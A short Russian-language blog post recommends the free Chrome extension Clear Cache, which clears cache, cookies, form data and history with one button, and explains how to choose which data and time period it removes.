Приветствую, хакеры! В данной небольшой статье я хочу рассказть о том, как чистить кэш в браузере одной кнопкой. Браузер старается сохранить различные данные, чтобы быстрее работать в дальнейшем, но не факт, что они потребуются вам, поэтому в какой-то момент кэш браузера может разрастись до десятка гигабайт, а то и больше, что отрицательно повлияет на быстродействие системы. Кэш в Chrome можно чистить через настройки, но есть более удобный способ — с помощью расширения Clear Cache. Оно бесплатное и делает ровно то, для чего предназначено — удаляет из браузера кэш и другие лишние данные. Очистка происходит по нажатию всего одной кнопки справа от адресной строки. После установки нужно выбрать, какие типы данных вы хотите удалять по нажатию на кнопку Clear Cache (кэш, куки, заполненные формы, историю сообщений и т. п.), а также период времени, за который производится очистка. Если вы интенсивно работаете в Chrome, можно выбрать удаление только кэша за последний час, этого уже будет достаточно для того, чтобы браузер начал работать шустрее. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.